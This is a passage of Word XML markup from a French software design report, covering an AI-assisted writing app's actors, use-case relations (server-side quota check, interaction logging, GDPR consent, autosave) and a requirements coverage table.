        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CASCADE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SET NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>selon l'intention décrite en § 5.4, et non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RESTRICT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— valeur par défaut de MySQL, qui ferait échouer toute suppression de compte au lieu de propager l'effacement, et rendrait le droit à l'effacement inapplicable. Les deux autres contrôles (présence des sept tables en InnoDB/utf8mb4, présence des index de performance) figurent dans le script livré.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601FA6F" w14:textId="56A00508" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc198828315"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> diagramme du comportement des fonctionnalités de type cas d’utilisations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acteurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois acteurs humains, liés par une relation de généralisation, et deux systèmes externes.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Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hérite de</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visiteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Humain, non authentifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Humain, rôle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visiteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Administrateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Humain, rôle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moteur d'inférence (Ollama)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Système externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Service de messagerie (SMTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Système externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">généralisation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entre acteurs évite de dupliquer les cas d'utilisation : un administrateur dispose de tout ce dont dispose un utilisateur, plus le back-office. C'est la traduction exacte du routeur, où</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requiresAuth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requiresAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="74" w:name="Xd5997c4680cfde84c35179c2359e3d31ed30e45"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Diagramme de cas d'utilisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="4156616"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="usecase.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="4156616"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Diagramme de cas d'utilisation.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="Xd9ae0beabe9697203bd5b535650fd83f9e2c39f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les relations, et ce qu'elles imposent au code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les relations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">«include»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">«extend»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne sont pas décoratives : chacune correspond à une contrainte que le code doit garantir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Générer une assistance IA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«include»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vérifier le quota</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'inclusion signifie que la vérification est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">systématique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et non conditionnelle. Le quota ne peut donc pas être contrôlé côté navigateur : il l'est dans la route, avant tout appel au modèle. Un client modifié qui masquerait la vérification se heurterait quand même au</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">du serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Générer une assistance IA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«include»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Journaliser l'interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Toute génération produit une ligne dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t>. C'est à la fois l'exigence de traçabilité du cahier des charges et le mécanisme même du quota : le comptage lit ce journal (§ 5.4). Journalisation et quota ne sont donc pas deux fonctionnalités séparées mais deux usages du même enregistrement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">S'inscrire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«include»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recueillir le consentement RGPD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">On ne peut pas créer un compte sans consentement : l'inclusion interdit un parcours d'inscription qui le reporterait à plus tard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rédiger et enregistrer un document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«extend» par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enregistrer automatiquement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>L'extension, elle, est conditionnelle : l'enregistrement automatique se déclenche sous condition — un titre valide et un délai d'inactivité écoulé (§ 7.1). L'enregistrement manuel reste le cas nominal, l'automatique l'étend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Insérer ou remplacer la proposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est un cas distinct de la génération.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ce découpage traduit une décision de conception : la génération ne modifie pas le document. L'application du résultat est un acte séparé, décidé par l'utilisateur. Fusionner les deux cas serait plus simple à dessiner, mais décrirait un produit qui écrit à la place de son utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="77" w:name="X59ec630a34ebd4114985151c1404fb46ffd8f9d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Couverture du cahier des charges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Chaque fonctionnalité listée au cahier des charges (§ 2) est couverte par au moins un cas d'utilisation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Cahier des charges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cas d'utilisation correspondant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">a. Inscription / connexion / déconnexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S'inscrire, Se connecter, Se déconnecter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">a. Récupération de mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Demander une réinitialisation, Réinitialiser le mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">a. Rôles utilisateur / administrateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Généralisation Administrateur → Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">b. Éditeur et trois commandes IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rédiger un document, Générer une assistance IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">b. Insertion ou remplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insérer ou remplacer la proposition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">c. CRUD documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Créer / Rédiger / Supprimer un document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">c. Enregistrement automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enregistrer automatiquement («extend»)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">c. Historique des interactions IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consulter l'historique IA, Journaliser l'interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">c. Organisation en dossiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Organiser en dossiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">d. Appels sécurisés, prompt dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Générer une assistance IA (acteur externe Ollama)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">e. Gestion des utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lister les utilisateurs, Modifier le rôle et le quota, Supprimer un compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">e. Statistiques d'usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consulter les statistiques globales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">e. Système de quota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérifier le quota («include»)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34F143C0" w14:textId="229D3986" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc198828316"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> diagramme du détail des cas d’utilisations les plus significatifs de type diagramme de séquence.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cas retenu est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
